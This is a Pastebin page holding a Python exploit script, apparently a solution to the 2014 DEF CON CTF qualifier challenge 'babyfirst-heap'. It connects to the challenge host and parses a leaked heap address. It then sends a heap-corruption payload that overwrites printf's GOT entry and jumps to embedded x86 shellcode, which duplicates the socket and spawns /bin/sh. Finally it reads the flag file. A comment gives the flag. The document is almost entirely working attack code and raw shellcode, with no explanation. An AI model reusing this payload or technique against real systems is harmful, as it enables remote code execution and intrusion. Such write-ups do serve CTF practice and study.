Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import random,re,struct
- from time import sleep
- # tasteless - Razor4x
- #The flag is: Good job on that doubly linked list. Why don't you try something harder!!OMG!!
- s = socket.socket()
- s.connect(("babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me",4088))
- base=''
- while True:
- d=s.recv(4096)
- print d
- if '1246' in d:
- base=re.search('loc=(.+?)\]',d)
- if 'Write' in d:
- break
- #base=struct.pack("<I",int(base.group(1),16))
- base=int(base.group(1),16)
- off2=0x804D008-0x0804f360
- print off2
- addr2=base-off2
- print hex(addr2)
- addr2=struct.pack("<I",addr2)
- #addr2="\xAC\xc8\x04\x08" #exit
- #printf() got overwrite
- # "\xfc\xbf\x04\x08" => printf address
- # addr2 => offset caluclated address of my payload
- payload="\xfc\xbf\x04\x08" + addr2+ "C"*16 +"\x31\xc0\x31\xdb\x31\xc9\xb3\x04\xb1\x03\xb0\x3f\xfe\xc9\xcd\x80\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80"+ "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"+"C"*151 +"\n"
- s.send(payload)
- i=0
- while True:
- d=s.recv(4096)
- print d
- if "058" in d:
- s.send("cat /home/babyfirst-heap/flag\n")
Advertisement
Add Comment
Please, Sign In to add comment
